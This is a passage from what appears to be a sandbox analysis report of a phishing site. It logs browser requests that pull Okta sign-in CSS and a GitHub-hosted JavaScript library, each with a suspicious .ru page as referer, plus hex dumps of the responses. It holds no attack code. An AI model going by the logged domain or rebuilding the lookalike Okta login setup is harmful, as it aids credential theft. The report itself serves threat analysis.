                                                                  Data Ascii: \vZ&$H,jrcPB$y_<wxy\<,,7,rr+!%*\( h5x4Qs6&i&ih4mo=mM}}fgM^?~iqa=3g>|f~dXFnfprFEub6ya4S1B*eS*3j*
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 92 8e 4f e8 03 57 25 06 a2 50 29 a2 7d 00 04 d2 dc 3e 3e 6a 1f 51 82 81 28 d2 05 40 19 b0 f2 16 ba 89 5e fc fc 7e a1 e8 94 50 72 16 8a cb e6 7e 74 67 3d 77 f9 6e 0d f9 91 c7 c7 6b 74 7c 84 59 82 95 50 98 5c 34 8b c4 92 a1 60 4e 19 40 0a 26 7d 4b 4a bd 84 af 9c bd 68 5d 40 0a 3c c4 75 43 81 2b ee 1e 24 7a 84 8c 8d 23 30 36 34 8c 81 99 62 89 03 91 96 24 9c 87 a2 64 0d e7 e7 8b 98 f0 50 5f 83 9f 01 04 1b ba 4d e1 20 d8 fe a2 5e 51 18 a8 42 4e c4 36 19 67 f9 8b 5f 9f 9b 35 eb dc d7 17 e1 73 f6 6c f8 dc f2 cc 1a b3 79 cd 33 5b b6 3c d3 6b 36 f7 3e a3 5e fb 3a 52 1e 38 80 54 3f 5a bb f6 75 e1 9b 03 07 84 af 7f b4 f6 58 c3 7d ef ad 5e fd de 7d 0d b6 4f 51 df 71 b3 a0 cd 9e 40 4e 9c c5 00 72 cc 20 cc a2 46 50 06 36 b5 40 9b ee ed e5 ef eb a5 f5 d6 aa 8d 11 64 ae
                                                                  Data Ascii: OW%P)}>>jQ(@^~Pr~tg=wnkt|YP\4`N@&}KJh]@<uC+$z#064b$dP_M ^QBN6g_5sly3[<k6>^:R8T?ZuX}^}OQq@Nr FP6@d
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: d1 4c 9e 25 c7 8f 07 bb 9d 76 33 f1 9b 9a 61 30 33 48 c1 34 a9 c0 6b 02 df 09 9c 13 62 ed 04 68 19 26 3a 0a b4 63 64 40 24 64 f5 37 aa d5 2e 20 b0 3a ea af c5 48 8a 51 f4 a1 90 a4 b4 a9 82 04 57 8e 4b a2 7e 1c ba 9b 9a 1f 91 51 1a 17 5b 9a a9 cb 4b 45 56 eb a5 94 02 8b 29 c5 52 90 04 ee 1d 75 ed 2c 01 4b 72 e3 4a 33 22 c2 cd a5 71 b9 8b 03 ee bc c8 6f 2f 48 49 9a 36 2d 29 a5 e0 f7 c4 e9 03 9f 52 a8 e2 4b 41 3e 03 81 af 33 2c d3 c0 d7 43 5a 7f cc 81 e8 7b c0 af 33 c1 96 42 98 47 4d 74 8e 21 03 8b 48 28 d8 db 30 d0 82 a9 33 15 ec eb e3 ee e6 ea a2 52 32 81 28 50 09 da 0f 45 02 e9 19 66 da 0a 13 52 10 8a 45 57 4a 81 80 f0 ae 25 cb cb 67 f4 89 4e e8 56 ac 6d 6d cf 4c 89 b3 04 94 46 af b0 fe 1c 68 16 aa 96 55 17 6e 4a 40 33 89 57 7a 67 bd 61 75 41 4a 8e 31 ca
                                                                  Data Ascii: L%v3a03H4kbh&:cd@$d7. :HQWK~Q[KEV)Ru,KrJ3"qo/HI6-)RKA>3,CZ{3BGMt!H(03R2(PEfREWJ%gNVmmLFhUnJ@3WzgauAJ1


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.449749140.82.121.34435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC708OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                                                  Host: github.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:00 UTC978INHTTP/1.1 302 Found
                                                                  Server: GitHub.com
                                                                  Date: Fri, 14 Mar 2025 11:30:54 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 0
                                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                  Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250314%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250314T113054Z&X-Amz-Expires=300&X-Amz-Signature=b36e5b21c5c25f14200202b073a138fc84a0aa21abce476eb7b59bbedfb609ce&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                  Cache-Control: no-cache
                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                  X-Frame-Options: deny
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  2025-03-14 11:31:00 UTC3370INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75
                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.44975113.33.187.144435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC654OUTGET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1
                                                                  Host: ok4static.oktacdn.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:00 UTC769INHTTP/1.1 200 OK
                                                                  Content-Type: text/css
                                                                  Content-Length: 222931
                                                                  Connection: close
                                                                  Date: Tue, 11 Mar 2025 10:14:43 GMT
                                                                  Server: nginx
                                                                  Last-Modified: Tue, 14 May 2024 21:48:24 GMT
                                                                  ETag: "0329c939fca7c78756b94fbcd95e322b"
                                                                  x-amz-meta-sha1sum: 7b5499b46660a0348cc2b22cae927dcc3fda8b20
                                                                  Expires: Wed, 11 Mar 2026 10:14:43 GMT
                                                                  Cache-Control: max-age=31536000
                                                                  Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                  Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                  Access-Control-Allow-Origin: *
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding
                                                                  X-Cache: Hit from cloudfront
                                                                  Via: 1.1 2e8126aebd83e92e3cf50c4f9c832912.cloudfront.net (CloudFront)
                                                                  X-Amz-Cf-Pop: FRA60-P9
                                                                  X-Amz-Cf-Id: EygOA2ZlSDWw1NBmLrC7Zr41YaqTIRoMZ2qTf_H_4ZUQijVIewWQcw==
                                                                  Age: 263777
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 71 74 69 70 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 2e 35 70 78 3b 6c 65 66 74 3a 2d 32 38 30 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 38 30 30 30 70 78 7d 2e 71 74 69 70 2d 63 6f 6e 74 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 39 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 71
                                                                  Data Ascii: @charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.q
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 66 6f 72 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 69 73 6d 69 73 73 2d 69 63 6f 6e 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 7b 73 70 65 61 6b 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d
                                                                  Data Ascii: fore{font-size:32px;position:absolute}#okta-sign-in .dismiss-icon,#okta-sign-in [class*="-32"]:after,#okta-sign-in [class*="-32"]:before,#okta-sign-in [class^="-32"]:after,#okta-sign-in [class^="-32"]:before{speak:none;-webkit-font-smoothing:antialiased;-
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 6e 74 3a 22 5c 65 30 31 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 72 65 6d 6f 76 65 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 61 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 31 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 72 65 6d 6f 76 65
                                                                  Data Ascii: nt:"\e01d"}#okta-sign-in .group-remove-16:after{color:#007cc0;content:"\e00a"}#okta-sign-in .group-member-add-16:before{color:#5e5e5e;content:"\e00d"}#okta-sign-in .group-member-add-16:after{color:#007cc0;content:"\e001"}#okta-sign-in .group-member-remove
                                                                  2025-03-14 11:31:00 UTC15095INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39 66 39 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 20 32 32 70 78 20 30 20 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b
                                                                  Data Ascii: background:#f9f9f9}#okta-sign-in .dropdown.more-actions .option-selected{color:#333;float:none!important;overflow:hidden;padding:0 22px 0 8px!important;position:relative;white-space:nowrap}#okta-sign-in .page-links .dropdown.more-actions .option-selected{
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 6e 3a 72 74 6c 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 35 70 78 20 34 70 78 20 32 30 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 68 7a 6e 2d 72 74 6c 20 2e 63 68 7a 6e 2d 73 69 6e 67 6c 65 20 64 69 76 20 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 36 70 78 20 32 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 68 7a 6e 2d 72 74 6c 2e 63 68 7a 6e 2d 77 69 74 68 2d 64 72 6f 70 20 2e 63 68 7a 6e 2d 73 69 6e 67 6c 65 20 64 69 76 20 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 32 70 78 20 32 70 78 7d 40 6d 65 64 69 61 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64
                                                                  Data Ascii: n:rtl;padding:4px 5px 4px 20px}#okta-sign-in .chzn-container-single.chzn-rtl .chzn-single div b{background-position:6px 2px}#okta-sign-in .chzn-container-single.chzn-rtl.chzn-with-drop .chzn-single div b{background-position:-12px 2px}@media (-webkit-min-d
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 64 65 72 2d 62 6f 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 69 6d 70 6c 65 6d 6f 64 61 6c 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6f 2d 66 6f 72 6d 2d 74 68 65 6d 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 69 6d 70 6c 65 6d 6f 64 61 6c 2d 77 72 61 70 20 2e 6f 2d 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 2e 6f 2d 66 6f 72 6d 2d 74 68 65 6d 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 64 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 31 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 33 2d 34 20 2e 6f 2d 66 6f 72 6d 2d 6c 61 62 65 6c 7b 77 69 64 74 68 3a 32 35 25 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f
                                                                  Data Ascii: der-box}#okta-sign-in .simplemodal-container .o-form-theme,#okta-sign-in .simplemodal-wrap .o-form-content.o-form-theme{border-color:#ddd;border-radius:0;border-width:0 1px;padding:30px}#okta-sign-in .o-form-3-4 .o-form-label{width:25%}#okta-sign-in .o-fo
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 6c 61 62 65 6c 2d 69 6e 6c 69 6e 65 2b 2e 69 6e 70 75 74 2d 66 69 78 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 69 6e 70 75 74 2d 66 69 78 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 74 65 78 74 61 72 65 61 2d 66 69 78 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 38 63 38 63 39 36 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 34 30 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 69 6e 70 75 74 2d 66 69 78 20 69
                                                                  Data Ascii: -sign-in .o-form .o-form-label-inline+.input-fix input[type=text]{line-height:27px}#okta-sign-in .o-form .input-fix,#okta-sign-in .o-form .textarea-fix{border:1px solid #8c8c96;display:inline-block;float:left;height:40px}#okta-sign-in .o-form .input-fix i
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 35 65 64 66 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 32 34 61 39 34 3b 63 6f 6c 6f 72 3a 23 31 32
                                                                  Data Ascii: dary.link-button:last-of-type{margin-bottom:25px}#okta-sign-in .button-secondary.link-button:active,#okta-sign-in .button-secondary.link-button:focus,#okta-sign-in .button-secondary.link-button:hover{background-color:#e5edfb;border-color:#124a94;color:#12
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 70 7b 63 6f 6c 6f 72 3a 23 36 65 36 65 37 38 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e
                                                                  Data Ascii: p,#okta-sign-in .granular-consent .consent-description p{color:#6e6e78}#okta-sign-in .consent-required .consent-footer,#okta-sign-in .granular-consent .consent-footer{text-align:center}#okta-sign-in .consent-required .consent-footer a,#okta-sign-in .gran
                                                                  2025-03-14 11:31:00 UTC16384INData Raw: 67 2d 73 70 69 6e 6e 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 65 6e 72 6f 6c 6c 2d 75 32 66 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 65 6e 72 6f 6c 6c 2d 77 65 62 61 75 74 68 6e 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 76 65 72 69 66 79 2d 75 32 66 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 76 65 72 69 66 79 2d 77 65 62 61 75 74 68 6e 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65
                                                                  Data Ascii: g-spinner{display:none}#okta-sign-in .enroll-u2f-form .o-form-fieldset-container p,#okta-sign-in .enroll-webauthn-form .o-form-fieldset-container p,#okta-sign-in .verify-u2f-form .o-form-fieldset-container p,#okta-sign-in .verify-webauthn-form .o-form-fie


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.44975013.33.187.144435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC663OUTGET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1
                                                                  Host: ok4static.oktacdn.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:00 UTC768INHTTP/1.1 200 OK
                                                                  Content-Type: text/css
                                                                  Content-Length: 10498
                                                                  Connection: close
                                                                  Date: Tue, 11 Mar 2025 10:14:43 GMT
                                                                  Server: nginx
                                                                  Last-Modified: Thu, 14 Mar 2024 00:03:58 GMT
                                                                  ETag: "e0d37a504604ef874bad26435d62011f"
                                                                  x-amz-meta-sha1sum: 4301f0d2b729ae22adece657d79eccaa25f429b1
                                                                  Expires: Wed, 11 Mar 2026 10:14:43 GMT
                                                                  Cache-Control: max-age=31536000
                                                                  Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                  Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                  Access-Control-Allow-Origin: *
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding
                                                                  X-Cache: Hit from cloudfront
                                                                  Via: 1.1 d818b372f81cbe23bb149df5877c444a.cloudfront.net (CloudFront)
                                                                  X-Amz-Cf-Pop: FRA60-P9
                                                                  X-Amz-Cf-Id: nZ14F8nferF4OJSg-wErxBodIOm301BvsQEBDBpZHgXOQqMqk9r3nQ==
                                                                  Age: 263777
                                                                  2025-03-14 11:31:00 UTC10498INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c 6f 62 6a 65 63 74 2c 6f 6c 2c 70 2c 70 72 65 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 70 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74
                                                                  Data Ascii: a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,t


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.449752185.199.108.1334435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC1143OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250314%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250314T113054Z&X-Amz-Expires=300&X-Amz-Signature=b36e5b21c5c25f14200202b073a138fc84a0aa21abce476eb7b59bbedfb609ce&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                  Host: objects.githubusercontent.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
